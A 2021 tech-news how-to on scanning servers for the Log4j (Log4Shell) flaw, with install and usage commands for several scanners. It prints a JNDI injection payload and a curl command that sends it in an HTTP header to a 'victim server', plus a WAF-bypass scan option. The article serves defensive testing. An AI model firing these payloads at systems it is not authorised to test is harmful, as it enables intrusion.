Wednesday, May 25, 2022
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory
  • Login
  • Register
Cloud7 News
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • How-Tos
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • Video
No Result
View All Result
Cloud7 News
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • How-Tos
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • Video
No Result
View All Result
Cloud7 News
No Result
View All Result

Home > How-Tos > How to scan your server for Log4j (Log4Shell) vulnerability

How to scan your server for Log4j (Log4Shell) vulnerability

The Apache Log4j vulnerability impacted hundreds of millions of devices. The IT and security teams of the enterprises are trying to discovered if their systems are affected.

Ugur Kubilay Cam by Ugur Kubilay Cam
December 16, 2021
in Cybersecurity, How-Tos
5 min read
0 0
0
How to scan your server for Log4j (Log4Shell) vulnerability
0
SHARES
15.9k
VIEWS
Share on FacebookShare on TwitterShare on EmailFollow on Google News

Log4j is a widely used software library for logging security and performance information. Security experts discovered a Zero-day vulnerability in the popular library, affecting many enterprise IT systems. Several vendors have released different tools, but a second vulnerability is discovered after a short time. The Apache Software Foundation has pushed out a new fix after that. If your system has any Java application using a version of Log4j before 2.14.1, you should act very quickly. You can scan your system to check the Log4j vulnerability with the following tools quickly.

Tip: You can follow the updated list and solutions of the applications or systems affected by the Log4j vulnerability here. (The list is constantly updated)

Table of Contents

  • Apache Log4j CVE-2021-44228 Scanner
    • Usage
  • CISA Log4j Scanner
    • Usage
  • Huntress Labs log4shell tester
    • Usage
  • Trend Micro Log4j Vulnerability Tester
  • Usage

Apache Log4j CVE-2021-44228 Scanner

apache log4j cve 2021-44228 scanner

Scanning your system to check for the Apache Log4j vulnerability is very easy. All you have to do is executing the open-source tool: Apache Log4j CVE-2021-44228 developed by Adil Soybali, a security researcher from Seccops Cyber Security Technologies Inc.

Features

  • Scanning according to the URL list you provide.
  • Scanning by finding the subdomains of the provided domain name.
  • Adding the source domain as a prefix to determine from which source the incoming DNS queries are coming.

Requirements

  • httpx
  • curl

Installation

git clone https://github.com/adilsoybali/Log4j-RCE-Scanner.git
cd Log4j-RCE-Scanner
chmod +x log4j-rce-scanner.sh

Usage

./log4j-rce-scanner.sh -h

This will display help for the tool. Here are all the switches it supports.

-h, --help - Display help
-l, --url-list - List of domain/subdomain/ip to be used for scanning.
-d, --domain - The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid - Burp collabrator client id address or interactsh domain address.

Example uses:
./log4j-rce-scanner.sh -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
./log4j-rce-scanner.sh -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
If the domain is vulnerable, DNS callbacks with the vulnerable domain name is sent to the burp collaborator or interactsh address you provided.
Log4j Log4shell Scanner Setup
Log4j Log4shell Scanner Setup
  • Burp collaborator documentation page
  • Easy way to set up a custom Burp Collaborator instance in a docker environment
  • Interactsh

Official GitHub Repository

  • https://github.com/adilsoybali/Log4j-RCE-Scanner

CISA Log4j Scanner

https://github.com/cisagov/log4j-scanner

This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The information and code in this repository is provided “as is” and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community. This is not intended to be a 100% true positive solution; False negatives may occur.

cisa log4j scanner

Usage

Scan a Single URL

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local

Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests

Discover WAF bypasses on the environment.

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass

Scan a list of URLs

$ python3 log4j-scan.py -l urls.txt

Huntress Labs log4shell tester

https://log4shell.huntress.com

This tester provides a payload with a unique identifier and accepts LDAP connections from vulnerable apps and displays the IP address receiving connections. The sample code (payload) mentioned bottom can also be used to test this out.

Usage

You simply copy and paste the generated JNDI syntax (payload) (the code block ${jndi[:]ldap[:]//.... presented below) into anything (application input boxes, frontend site form fields, logins such as username inputs, or if you are a bit more technical, even User-Agent or X-Forwarded-For or other customizable HTTP headers).

Sample Code (Payload):

${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}

How to send the Log4j payload to the victim server?

  1. You can send the payload to the victim server using a user agent switcher extension on your web browser.
  2. You can also send a curl request to the victim server via the Linux terminal.
curl http://vulnerable-app:8080 \ -H 'X-Api-Version: ${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}'


Trend Micro Log4j Vulnerability Tester

log4j-tester.trendmicro.com

Usage

Watch the video below on how to use the Log4J tester.


Related Stories

  • Two new vulnerabilities are found on Log4j, only one of them is fixed yet
  • CISA published an emergency directive for Log4j
  • Google joining the war against Log4j exploits
  • Hackers exploit Log4j to inject Monero miners, shifting from LDAP to RMI
  • A third, new Apache Log4j vulnerability is discovered
  • The Log4j flaw is patched but it is still vulnerable
  • CISA published Log4j vulnerability guidance
  • Zero-day Apache Log4j RCE vulnerability (Log4Shell) is being exploited
ShareTweetSendShare
Get free daily newsletters from Cloud7 News Get the Cloud7 Newsletter

Check your inbox or spam folder to confirm your subscription.

By subscribing, you agree to our
Copyright Policy and Privacy Policy
Previous Post

Windows security update fixes 67 flaws

Next Post

Telstra expanding its network infrastructure in the U.S.

Ugur Kubilay Cam

Ugur Kubilay Cam

Ugur Kubilay Cam is the content marketing specialist of Cloud7 News. In addition to being an SEO expert, Ugur Kubilay is a Python developer and cybersecurity researcher. Ugur has a Bachelor's degree and a master's degree in Data Analysis. With more than 15 years of experience, Ugur Kubilay Cam is an active Linux user and administrator.

Related News

StackPatch unveils new WAF packages

StackPath unveils new WAF packages

May 24, 2022 4:56 pm

Word files embedded in PDF files are carrying keyloggers

May 24, 2022 2:24 pm
QNAP NAS devices are vulnerable once more

QNAP NAS devices are vulnerable once more

May 24, 2022 2:14 pm
Russian bank is under heavy DDoS attack

Russian bank is under heavy DDoS attack

May 23, 2022 3:28 pm
Next Post
Telstra expanding its network infrastructure in the U.S.

Telstra expanding its network infrastructure in the U.S.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

I agree to the Terms & Conditions and Privacy Policy.

Editor's Choice

Interview with Igor Seletskiy on AlmaLinux

7 best hosting control panels

How to update Linux Kernel without rebooting?

7 best Linux mail servers for 2022

7 best cPanel alternatives for 2022

7 best Linux web browsers for 2022

cPanel Security: 7 steps to secure cPanel

7 best CentOS alternatives

7 best Linux server distros for 2022

How to scan your server for Log4j (Log4Shell) vulnerability

Best web hosting service providers

AlmaLinux 8.6 Stable is ready to download

Ubuntu 22.04 LTS is available for download. What is new?

Advertisement

Recent News

  • Microsoft announces its website builder platform, Power Pages
  • AWS introduces EC2 C7g instances powered by Graviton3 processors
  • StackPath unveils new WAF packages
  • Alpine Linux 3.16.0 is ready to download
  • Word files embedded in PDF files are carrying keyloggers

Our Latest Interview

Interview: Erez Barak, Vice President Observability of Sumo Logic
Interview

Interview: Erez Barak, Vice President Observability of Sumo Logic

by Atalay Kelestemur
November 25, 2021 3:23 am


Cloud7 News is a news source that publishes the latest news, industry news and exclusive interviews on web hosting, cloud computing, data center, cybersecurity and linux.

News Categories

  • Web Hosting
  • Cloud Computing
  • Data Center
  • Cybersecurity
  • Linux
  • Network/Internet
  • Software
  • Hardware
  • Blockchain

Our Free Modules

  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory

Get the Cloud7 Newsletter

Get FREE daily newsletters from Cloud7 delivering the latest news and reviews.

  • About Us
  • Privacy & Policy
  • Copyright Policy
  • Contact

© 2022, Cloud7 News. Latest Cloud Computing, Web Hosting, Data Center Industry and Tech News

No Result
View All Result
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • How-Tos
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • Video
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory

© 2022, Cloud7 News. Latest Cloud Computing, Web Hosting, Data Center Industry and Tech News

Welcome Back!

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Fill the forms below to register

*By registering into our website, you agree to the Terms & Conditions and Privacy Policy.
All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.